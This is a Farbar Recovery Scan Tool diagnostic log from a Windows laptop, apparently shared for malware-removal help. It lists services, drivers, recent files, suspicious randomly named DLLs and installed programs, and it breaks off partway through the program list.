Extension: (Google Search) - C:\Users\Nikki\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-08-18] CHR Extension: (Google Wallet) - C:\Users\Nikki\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-08-18] CHR Extension: (Gmail) - C:\Users\Nikki\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-08-18] ========================== Services (Whitelisted) ================= (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) R2 APNMCP; C:\Program Files\AskPartnerNetwork\Toolbar\apnmcp.exe [166296 2014-08-29] (APN LLC.) R2 ClickToRunSvc; C:\Program Files\Microsoft Office 15\ClientX86\OfficeClickToRun.exe [1626800 2014-07-31] (Microsoft Corporation) R2 Credential Vault Host Control Service; C:\Program Files\Broadcom Corporation\Broadcom USH Host Components\CV\bin\HostControlService.exe [826272 2010-10-25] (Broadcom Corporation) R2 Credential Vault Host Storage; C:\Program Files\Broadcom Corporation\Broadcom USH Host Components\CV\bin\HostStorageService.exe [32160 2010-10-25] (Broadcom Corporation) R2 dcpsysmgrsvc; C:\Program Files\Dell\Dell System Manager\DCPSysMgrSvc.exe [388464 2011-01-20] (Dell Inc.) 
R2 ekrn; C:\Program Files\ESET\ESET NOD32 Antivirus\ekrn.exe [1337752 2013-09-12] (ESET) R2 IDriveE Service; C:\IDrive\IDriveE Service.exe [157128 2011-11-21] (Pro Softnet Corporation) R2 MBAMScheduler; C:\Program Files\Malwarebytes Anti-Malware\mbamscheduler.exe [1809720 2014-05-12] (Malwarebytes Corporation) R2 MBAMService; C:\Program Files\Malwarebytes Anti-Malware\mbamservice.exe [860472 2014-05-12] (Malwarebytes Corporation) R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [44032 2010-01-18] (Hewlett-Packard) [File not signed] R2 O2FLASH; C:\Windows\system32\DRIVERS\o2flash.exe [72296 2010-02-10] (O2Micro International) R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [53760 2010-01-18] (Hewlett-Packard) [File not signed] R2 ReflectService.exe; C:\Program Files\Macrium\Reflect\ReflectService.exe [605168 2014-02-19] (Paramount Software UK Ltd) R2 RosettaStoneDaemon; C:\Program Files\RosettaStoneLtdServices\RosettaStoneDaemon.exe [1646608 2012-06-19] (Rosetta Stone Ltd.) S3 SecureStorageService; C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Secure Storage Manager\SecureStorageService.exe [1477632 2010-11-03] (Wave Systems Corp.) [File not signed] R2 STacSV; C:\Program Files\IDT\WDM\STacSV.exe [274514 2011-01-24] (IDT, Inc.) S2 tcsd_win32.exe; C:\Program Files\NTRU Cryptosystems\NTRU TCG Software Stack\bin\tcsd_win32.exe [1629696 2010-07-13] () [File not signed] R2 TdmService; C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmService.exe [2337136 2011-03-04] (Wave Systems Corp.) ==================== Drivers (Whitelisted) ==================== (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) R3 Acceler; C:\Windows\System32\DRIVERS\Accelern.sys [43888 2010-12-13] (ST Microelectronics) R3 BTWAMPFL; C:\Windows\System32\DRIVERS\btwampfl.sys [300584 2014-02-18] (Broadcom Corporation.) 
R3 cvusbdrv; C:\Windows\System32\Drivers\cvusbdrv.sys [33832 2010-08-24] (Broadcom Corporation) R3 e1cexpress; C:\Windows\System32\DRIVERS\e1c6232.sys [358224 2012-08-10] (Intel Corporation) R1 eamonm; C:\Windows\System32\DRIVERS\eamonm.sys [188808 2013-09-17] (ESET) R1 ehdrv; C:\Windows\System32\DRIVERS\ehdrv.sys [134248 2013-09-17] (ESET) R2 epfwwfpr; C:\Windows\System32\DRIVERS\epfwwfpr.sys [122376 2013-09-17] (ESET) R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [23256 2014-05-12] (Malwarebytes Corporation) R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [110296 2014-09-24] (Malwarebytes Corporation) R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [51928 2014-05-12] (Malwarebytes Corporation) S3 MEI; C:\Windows\system32\drivers\HECI.sys [41088 2010-10-19] (Intel Corporation) R3 NETwNs32; C:\Windows\System32\DRIVERS\NETwNs32.sys [7434240 2010-12-21] (Intel Corporation) S3 nusb3hub; C:\Windows\system32\drivers\nusb3hub.sys [62208 2010-11-19] (Renesas Electronics Corporation) S3 nusb3xhc; C:\Windows\system32\drivers\nusb3xhc.sys [141568 2010-11-19] (Renesas Electronics Corporation) R1 nvkflt; C:\Windows\System32\DRIVERS\nvkflt.sys [208672 2013-12-04] (NVIDIA Corporation) R0 nvpciflt; C:\Windows\System32\DRIVERS\nvpciflt.sys [27936 2013-12-04] (NVIDIA Corporation) R3 O2MDFRDR; C:\Windows\System32\DRIVERS\O2MDFxp.sys [60192 2011-01-04] (O2Micro ) S3 O2MDRRDR; C:\Windows\system32\drivers\O2MDRw7.sys [62440 2011-01-04] (O2Micro ) R3 O2SDJRDR; C:\Windows\System32\DRIVERS\o2sdjvst.sys [63976 2011-03-23] (O2Micro ) R0 PBADRV; C:\Windows\System32\DRIVERS\PBADRV.sys [26608 2008-06-04] (Dell Inc) R0 pssnap; C:\Windows\System32\DRIVERS\pssnap.sys [16504 2013-06-28] (Macrium Software) S3 ST7007; C:\Windows\system32\drivers\ST7007.sys [62576 2011-06-20] (STMicroelectronics) R0 stdcfltn; C:\Windows\System32\DRIVERS\stdcfltn.sys [17648 2010-08-20] (ST Microelectronics) S3 tcm; C:\Windows\system32\drivers\tcm.sys [12952 2009-04-17] () 
==================== NetSvcs (Whitelisted) =================== (If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.) ==================== One Month Created Files and Folders ======== (If an entry is included in the fixlist, the file\folder will be moved.) 2014-09-24 03:55 - 2014-09-24 03:57 - 00000000 ____D () C:\FRST 2014-09-24 03:07 - 2014-09-24 03:39 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys 2014-09-24 03:06 - 2014-09-24 03:06 - 00001066 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk 2014-09-24 03:06 - 2014-09-24 03:06 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware 2014-09-24 03:06 - 2014-09-24 03:06 - 00000000 ____D () C:\ProgramData\Malwarebytes 2014-09-24 03:06 - 2014-09-24 03:06 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware 2014-09-24 03:06 - 2014-05-12 07:26 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys 2014-09-24 03:06 - 2014-05-12 07:25 - 00074456 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys 2014-09-24 03:06 - 2014-05-12 07:25 - 00023256 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys 2014-09-24 02:45 - 2014-09-24 02:45 - 00003288 ____N () C:\bootsqm.dat 2014-09-24 02:20 - 2014-03-04 05:17 - 00868352 _____ (Microsoft Corporation) C:\ProgramData\wsesfqh.dll 2014-09-24 02:20 - 2013-08-28 21:50 - 01289096 _____ (Microsoft Corporation) C:\ProgramData\qwypnms.dll 2014-09-23 23:00 - 2014-09-23 23:00 - 00048640 _____ () C:\Windows\system32\wosyw.dll 2014-09-23 23:00 - 2014-09-23 23:00 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage 2014-09-23 23:00 - 2014-09-23 23:00 - 00000000 _____ () C:\Windows\system32\xitpi.dll 2014-09-22 11:51 - 2014-09-22 11:51 - 00000000 ___RD () C:\Program Files\Skype 2014-09-22 11:51 - 2014-09-22 11:51 - 00000000 ____D 
() C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype 2014-09-22 11:51 - 2014-09-22 11:51 - 00000000 ____D () C:\Program Files\Common Files\Skype 2014-09-21 02:27 - 2014-09-21 02:27 - 00049673 _____ () C:\Users\Nikki\Documents\SAB2.pptx 2014-09-21 00:09 - 2014-09-21 01:58 - 00044040 _____ () C:\Users\Nikki\Documents\SAB.pptx 2014-09-17 19:37 - 2014-09-17 19:37 - 00004477 _____ () C:\Windows\system32\jupdate-1.7.0_67-b01.log 2014-09-17 19:37 - 2014-09-17 19:37 - 00000000 ____D () C:\Program Files\Common Files\Java 2014-09-16 21:29 - 2014-09-16 21:29 - 00157639 _____ () C:\Users\Nikki\Documents\Spanish II 2.05.wma 2014-09-14 19:05 - 2014-09-14 19:05 - 00001351 _____ () C:\Users\Nikki\Desktop\Sticky Notes.lnk 2014-09-14 02:22 - 2014-09-24 00:24 - 00042462 _____ () C:\Users\Nikki\Documents\TTI IP.pptx 2014-09-13 23:35 - 2014-09-17 13:17 - 00592384 _____ () C:\Users\Nikki\Documents\rectangle2.pptx 2014-09-13 21:56 - 2014-09-13 21:57 - 00153088 _____ () C:\Users\Nikki\Documents\rectangle1.pptx 2014-09-13 13:06 - 2014-08-19 13:39 - 00327872 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll 2014-09-13 13:06 - 2014-08-18 18:26 - 17455104 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll 2014-09-13 13:06 - 2014-08-18 18:08 - 04232704 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll 2014-09-13 13:06 - 2014-08-18 17:57 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb 2014-09-13 13:06 - 2014-08-18 17:57 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll 2014-09-13 13:06 - 2014-08-18 17:46 - 00454656 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll 2014-09-13 13:06 - 2014-08-18 17:45 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll 2014-09-13 13:06 - 2014-08-18 17:44 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll 2014-09-13 13:06 - 2014-08-18 17:44 - 00051200 _____ (Microsoft Corporation) 
C:\Windows\system32\ieetwproxystub.dll 2014-09-13 13:06 - 2014-08-18 17:42 - 02185728 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll 2014-09-13 13:06 - 2014-08-18 17:39 - 00043008 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll 2014-09-13 13:06 - 2014-08-18 17:39 - 00032768 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll 2014-09-13 13:06 - 2014-08-18 17:37 - 00440320 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll 2014-09-13 13:06 - 2014-08-18 17:36 - 00112128 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe 2014-09-13 13:06 - 2014-08-18 17:36 - 00108032 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe 2014-09-13 13:06 - 2014-08-18 17:35 - 00597504 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll 2014-09-13 13:06 - 2014-08-18 17:30 - 00646144 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe 2014-09-13 13:06 - 2014-08-18 17:27 - 00365056 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll 2014-09-13 13:06 - 2014-08-18 17:22 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll 2014-09-13 13:06 - 2014-08-18 17:19 - 00164864 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll 2014-09-13 13:06 - 2014-08-18 17:17 - 00243200 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll 2014-09-13 13:06 - 2014-08-18 17:17 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll 2014-09-13 13:06 - 2014-08-18 17:15 - 11769856 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll 2014-09-13 13:06 - 2014-08-18 17:09 - 00603136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll 2014-09-13 13:06 - 2014-08-18 17:08 - 02014208 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl 2014-09-13 13:06 - 2014-08-18 17:08 - 00673792 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe 2014-09-13 13:06 - 2014-08-18 17:07 - 01068032 _____ 
(Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll 2014-09-13 13:06 - 2014-08-18 16:46 - 01812992 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll 2014-09-13 13:06 - 2014-08-18 16:38 - 01190400 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll 2014-09-13 13:06 - 2014-08-18 16:36 - 00678400 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll 2014-09-13 13:06 - 2014-06-26 21:45 - 02285056 _____ (Microsoft Corporation) C:\Windows\system32\msmpeg2vdec.dll 2014-09-11 22:09 - 2014-07-06 21:40 - 01059840 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll 2014-09-11 22:09 - 2014-07-06 21:40 - 00550912 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll 2014-09-11 22:09 - 2014-06-23 22:59 - 01987584 _____ (Microsoft Corporation) C:\Windows\system32\d3d10warp.dll 2014-09-11 22:08 - 2014-09-04 21:52 - 00445952 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll 2014-09-11 22:08 - 2014-09-04 21:47 - 00302592 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll 2014-09-11 22:08 - 2014-08-01 07:35 - 00793600 _____ (Microsoft Corporation) C:\Windows\system32\TSWorkspace.dll 2014-09-10 19:50 - 2014-09-10 21:09 - 00048347 _____ () C:\Users\Nikki\Documents\!.pptx 2014-09-08 14:16 - 2014-09-08 14:16 - 00031357 _____ () C:\Users\Nikki\Documents\kh.pptx 2014-09-08 00:01 - 2014-09-08 00:01 - 00363678 _____ () C:\Users\Nikki\Documents\FW2.pptx 2014-09-07 17:08 - 2014-09-07 17:08 - 00376320 _____ () C:\Users\Nikki\Documents\FW.pptx 2014-09-05 12:30 - 2014-09-05 17:59 - 02697294 _____ () C:\Users\Nikki\Documents\USH 1.05H.pptx 2014-09-03 21:19 - 2014-09-03 21:19 - 00630206 _____ () C:\Users\Nikki\Documents\English II 1.04(2).pptx 2014-09-03 12:29 - 2014-09-03 12:29 - 00000000 ____D () C:\Users\Nikki\Documents\Bluetooth Exchange Folder 2014-08-30 21:23 - 2014-09-03 21:19 - 00630231 _____ () C:\Users\Nikki\Documents\English II 1.04.pptx 2014-08-29 13:56 - 2014-08-29 13:56 - 00005844 _____ () 
C:\Users\Nikki\Documents\Algebra II 1.05 Grid.ggb 2014-08-28 11:16 - 2014-08-22 21:46 - 00305152 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll 2014-08-28 11:16 - 2014-08-22 20:42 - 02352640 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys ==================== One Month Modified Files and Folders ======= (If an entry is included in the fixlist, the file\folder will be moved.) 2014-09-24 03:57 - 2014-09-24 03:55 - 00000000 ____D () C:\FRST 2014-09-24 03:56 - 2009-07-14 00:34 - 00030896 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 2014-09-24 03:56 - 2009-07-14 00:34 - 00030896 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 2014-09-24 03:46 - 2010-11-20 17:01 - 00782470 _____ () C:\Windows\system32\PerfStringBackup.INI 2014-09-24 03:39 - 2014-09-24 03:07 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys 2014-09-24 03:39 - 2014-08-18 12:26 - 00000880 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore1cfbb013a16b54f.job 2014-09-24 03:39 - 2014-04-01 14:01 - 00000000 ____D () C:\IDrive 2014-09-24 03:38 - 2014-05-20 22:47 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job 2014-09-24 03:38 - 2014-02-18 18:07 - 01728290 _____ () C:\Windows\WindowsUpdate.log 2014-09-24 03:38 - 2010-11-20 17:48 - 00161328 _____ () C:\Windows\PFRO.log 2014-09-24 03:38 - 2009-07-14 00:53 - 00000006 ____H () C:\Windows\Tasks\SA.DAT 2014-09-24 03:38 - 2009-07-14 00:52 - 00000000 ____D () C:\Windows\twain_32 2014-09-24 03:38 - 2009-07-14 00:39 - 00042432 _____ () C:\Windows\setupact.log 2014-09-24 03:37 - 2014-08-18 12:32 - 00000886 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA1cfbb01ef80f922.job 2014-09-24 03:06 - 2014-09-24 03:06 - 00001066 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk 2014-09-24 03:06 - 2014-09-24 03:06 - 00000000 ____D () 
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware 2014-09-24 03:06 - 2014-09-24 03:06 - 00000000 ____D () C:\ProgramData\Malwarebytes 2014-09-24 03:06 - 2014-09-24 03:06 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware 2014-09-24 03:05 - 2014-03-08 02:28 - 00000000 ____D () C:\_Installs 2014-09-24 02:45 - 2014-09-24 02:45 - 00003288 ____N () C:\bootsqm.dat 2014-09-24 00:24 - 2014-09-14 02:22 - 00042462 _____ () C:\Users\Nikki\Documents\TTI IP.pptx 2014-09-23 23:00 - 2014-09-23 23:00 - 00048640 _____ () C:\Windows\system32\wosyw.dll 2014-09-23 23:00 - 2014-09-23 23:00 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage 2014-09-23 23:00 - 2014-09-23 23:00 - 00000000 _____ () C:\Windows\system32\xitpi.dll 2014-09-23 21:55 - 2009-07-13 22:37 - 00000000 ____D () C:\Windows\system32\NDF 2014-09-22 13:13 - 2014-03-08 06:50 - 00000000 ____D () C:\Users\Nikki\AppData\Roaming\Skype 2014-09-22 12:52 - 2014-03-08 16:42 - 00000000 ____D () C:\Users\Nikki\Documents\Personal 2014-09-22 11:51 - 2014-09-22 11:51 - 00000000 ___RD () C:\Program Files\Skype 2014-09-22 11:51 - 2014-09-22 11:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype 2014-09-22 11:51 - 2014-09-22 11:51 - 00000000 ____D () C:\Program Files\Common Files\Skype 2014-09-22 11:51 - 2014-03-08 06:50 - 00002503 _____ () C:\Users\Public\Desktop\Skype.lnk 2014-09-22 11:51 - 2014-03-08 06:50 - 00000000 ____D () C:\ProgramData\Skype 2014-09-21 02:27 - 2014-09-21 02:27 - 00049673 _____ () C:\Users\Nikki\Documents\SAB2.pptx 2014-09-21 01:58 - 2014-09-21 00:09 - 00044040 _____ () C:\Users\Nikki\Documents\SAB.pptx 2014-09-17 21:07 - 2014-03-08 16:42 - 00000000 ____D () C:\Users\Nikki\Documents\myss 2014-09-17 19:40 - 2014-03-08 04:19 - 00000000 ____D () C:\ProgramData\Oracle 2014-09-17 19:37 - 2014-09-17 19:37 - 00004477 _____ () C:\Windows\system32\jupdate-1.7.0_67-b01.log 2014-09-17 19:37 - 2014-09-17 19:37 - 00000000 ____D () C:\Program 
Files\Common Files\Java 2014-09-17 19:37 - 2014-03-08 04:22 - 00000000 ____D () C:\Program Files\Java 2014-09-17 13:17 - 2014-09-13 23:35 - 00592384 _____ () C:\Users\Nikki\Documents\rectangle2.pptx 2014-09-16 22:53 - 2014-03-08 16:43 - 00000000 ____D () C:\Users\Nikki\Documents\Spanish I 2014-09-16 21:29 - 2014-09-16 21:29 - 00157639 _____ () C:\Users\Nikki\Documents\Spanish II 2.05.wma 2014-09-15 09:06 - 2014-03-08 02:24 - 00231568 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe 2014-09-14 20:51 - 2009-07-13 22:37 - 00000000 ____D () C:\Windows\Microsoft.NET 2014-09-14 19:38 - 2014-03-08 04:14 - 00701104 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe 2014-09-14 19:38 - 2014-03-08 04:14 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl 2014-09-14 19:05 - 2014-09-14 19:05 - 00001351 _____ () C:\Users\Nikki\Desktop\Sticky Notes.lnk 2014-09-13 21:57 - 2014-09-13 21:56 - 00153088 _____ () C:\Users\Nikki\Documents\rectangle1.pptx 2014-09-13 13:06 - 2014-03-08 16:21 - 00000000 ____D () C:\Windows\system32\MRT 2014-09-13 13:04 - 2014-04-30 16:45 - 00000000 ___SD () C:\Windows\system32\CompatTel 2014-09-13 13:04 - 2014-03-08 16:21 - 98758480 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe 2014-09-11 22:11 - 2014-08-18 12:27 - 00002135 _____ () C:\Users\Public\Desktop\Google Chrome.lnk 2014-09-10 21:09 - 2014-09-10 19:50 - 00048347 _____ () C:\Users\Nikki\Documents\!.pptx 2014-09-10 17:08 - 2014-08-19 09:53 - 00118076 _____ () C:\Users\Nikki\Documents\English II Pace Chart.xlsx 2014-09-08 14:16 - 2014-09-08 14:16 - 00031357 _____ () C:\Users\Nikki\Documents\kh.pptx 2014-09-08 00:01 - 2014-09-08 00:01 - 00363678 _____ () C:\Users\Nikki\Documents\FW2.pptx 2014-09-07 17:08 - 2014-09-07 17:08 - 00376320 _____ () C:\Users\Nikki\Documents\FW.pptx 2014-09-05 17:59 - 2014-09-05 12:30 - 02697294 _____ () C:\Users\Nikki\Documents\USH 1.05H.pptx 2014-09-04 21:52 - 2014-09-11 22:08 - 00445952 
_____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-09-04 21:47 - 2014-09-11 22:08 - 00302592 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-09-03 21:20 - 2014-04-09 16:54 - 01536000 ___SH () C:\Users\Nikki\Documents\Thumbs.db
2014-09-03 21:19 - 2014-09-03 21:19 - 00630206 _____ () C:\Users\Nikki\Documents\English II 1.04(2).pptx
2014-09-03 21:19 - 2014-08-30 21:23 - 00630231 _____ () C:\Users\Nikki\Documents\English II 1.04.pptx
2014-09-03 12:29 - 2014-09-03 12:29 - 00000000 ____D () C:\Users\Nikki\Documents\Bluetooth Exchange Folder
2014-09-03 12:28 - 2014-03-08 04:08 - 00000000 ____D () C:\Program Files\Mozilla Maintenance Service
2014-09-03 12:28 - 2009-07-14 00:33 - 00321192 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-08-30 18:01 - 2009-07-13 22:37 - 00000000 ____D () C:\Windows\rescache
2014-08-30 14:54 - 2014-04-03 16:48 - 00000000 ____D () C:\Program Files\Mozilla Firefox
2014-08-29 13:56 - 2014-08-29 13:56 - 00005844 _____ () C:\Users\Nikki\Documents\Algebra II 1.05 Grid.ggb
2014-08-29 11:48 - 2014-03-08 02:40 - 00000000 ____D () C:\Program Files\Microsoft Office 15

Files to move or delete:
====================
C:\ProgramData\qwypnms.dll
C:\ProgramData\wsesfqh.dll

Some content of TEMP:
====================
C:\Users\Nikki\AppData\Local\Temp\APNSetup.exe
C:\Users\Nikki\AppData\Local\Temp\emsxocl.dll
C:\Users\Nikki\AppData\Local\Temp\Foxit Reader Updater.exe
C:\Users\Nikki\AppData\Local\Temp\InstHelper.exe
C:\Users\Nikki\AppData\Local\Temp\MSNCDCB.exe
C:\Users\Nikki\AppData\Local\Temp\prmouyy.dll
C:\Users\Nikki\AppData\Local\Temp\ucfpooo.dll
C:\Users\Nikki\AppData\Local\Temp\ygnvvtu.dll

==================== Bamital & volsnap Check =================
(There is no automatic fix for files that do not pass verification.)
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-09-16 13:18

==================== End Of Log ============================

ADDITION.TXT:
===============================================================================================
Additional scan result of Farbar Recovery Scan Tool (x86) Version: 24-09-2014
Ran by Nikki at 2014-09-24 04:00:30
Running from H:\
Boot Mode: Normal
==========================================================

==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: ESET NOD32 Antivirus 7.0 (Enabled - Up to date) {19259FAE-8396-A113-46DB-15B0E7DFA289}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: ESET NOD32 Antivirus 7.0 (Enabled - Up to date) {A2447E4A-A5AC-AE9D-7C6B-2EC29C58E834}

==================== Installed Programs ======================
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
32 Bit HP CIO Components Installer (Version: 7.1.4 - Hewlett-Packard) Hidden AccelerometerP11 (HKLM\...\{87434D51-51DB-4109-B68F-A829ECDCF380}) (Version: 2.00.10.22 - STMicroelectronics) Adobe Flash Player 15 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 15.0.0.152 - Adobe Systems Incorporated) Adobe Flash Player 15 Plugin (HKLM\...\Adobe Flash Player Plugin) (Version: 15.0.0.152 - Adobe Systems Incorporated) Ask Toolbar (HKLM\...\{4F524A2D-5637-4300-76A7-A758B70C1002}) (Version: 12.16.2.57 - APN, LLC) <==== ATTENTION BioAPI Framework (Version: 1.0.2 - Dell Inc.) Hidden Conexant HDA D330 MDC V.92 Modem (HKLM\...\CNXT_MODEM_HDAUDIO_VEN_14F1&DEV_2C06&SUBSYS_14F1000F) (Version: 7.80.4.0 - Conexant) Custom (Version: 01.00.00.000 - Wave Systems Corp.) Hidden D3DX10 (Version: 15.4.2368.0902 - Microsoft) Hidden Dell ControlVault Host Components Installer (Version: 2.0.20.159 - Broadcom Corporation) Hidden Dell Data Protection | Access (HKLM\...\{A7D91856-258D-4C87-8041-B170851CE432}) (Version: 2.0.00001.000 - Dell Inc.) Dell Data Protection | Access (Version: 01.00.01.000 - Wave Systems Corp) Hidden Dell Data Protection | Access | Drivers (HKLM\...\{4E4E65EE-C456-45AC-B5AD-C62C3A325BD0}) (Version: 1.00.011 - Dell Inc.) Dell Data Protection | Access | Middleware (HKLM\...\{841CBDD5-4BB5-403E-AEE3-2FADC3890BE8}) (Version: 1.00.005 - Dell Inc.) Dell System Manager (HKLM\...\{43CFE88C-A97B-4875-9BCC-E93EC0EEEEA4}) (Version: 1.6.00000 - Dell Inc.) Dell Touchpad (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version: 7.1208.101.124 - ALPS ELECTRIC CO., LTD.) DellAccess (Version: 01.00.00.078 - Wave Systems Corp.) Hidden EMBASSY Security Center (Version: 04.02.00.072 - Wave Systems Corp.) Hidden ESET NOD32 Antivirus (HKLM\...\{1BE7C1D9-06A8-466D-ADEA-B07F68BDEFB5}) (Version: 7.0.302.26 - ESET, spol s r. o.) 
Foxit Reader (HKLM\...\Foxit Reader_is1) (Version: 6.0.5.618 - Foxit Corporation) FreeMind (HKLM\...\B991B020-2968-11D8-AF23-444553540000_is1) (Version: 0.9.0 - ) Gemalto (Version: 01.01.01.0000 - Wave Systems Corp) Hidden GeoGebra 4.4 (HKLM\...\GeoGebra 4.4) (Version: 4.4.22.0 - International GeoGebra Institute) Google Chrome (HKLM\...\Google Chrome) (Version: 37.0.2062.120 - Google Inc.) Google Toolbar for Internet Explorer (HKLM\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.5111.1712 - Google Inc.) Google Toolbar for Internet Explorer (Version: 1.0.0 - Google Inc.) Hidden Google Update Helper (Version: 1.3.24.15 - Google Inc.) Hidden IDrive version 3.4.1 January 03, 2012 (HKLM\...\IDrive_is1) (Version: 3.4.1 - ProSoftnet Corp) Intel® Processor Graphics (HKLM\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2418 - Intel Corporation) Java Auto Updater (Version: 2.1.67.1 - Oracle, Inc.) Hidden Junk Mail filter update (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden Macrium Reflect Free Edition (HKLM\...\MacriumReflect) (Version: 5.2 - Paramount Software (UK) Ltd.) Macrium Reflect Free Edition (Version: 5.2.6474 - Paramount Software (UK) Ltd.) 
Hidden Malwarebytes Anti-Malware version 2.0.2.1012 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.2.1012 - Malwarebytes Corporation) Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation) Microsoft .NET Framework 4.5.1 (Version: 4.5.50938 - Microsoft Corporation) Hidden Microsoft Application Error Reporting (Version: 12.0.6012.5000 - Microsoft Corporation) Hidden Microsoft Office Home and Student 2013 - en-us (HKLM\...\HomeStudentRetail - en-us) (Version: 15.0.4641.1003 - Microsoft Corporation) Microsoft OneDrive (HKCU\...\OneDriveSetup.exe) (Version: 17.0.4023.1211 - Microsoft Corporation) Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 4.0.50401.0 - Microsoft Corporation) Microsoft SQL Server 2005 Compact Edition [ENU] 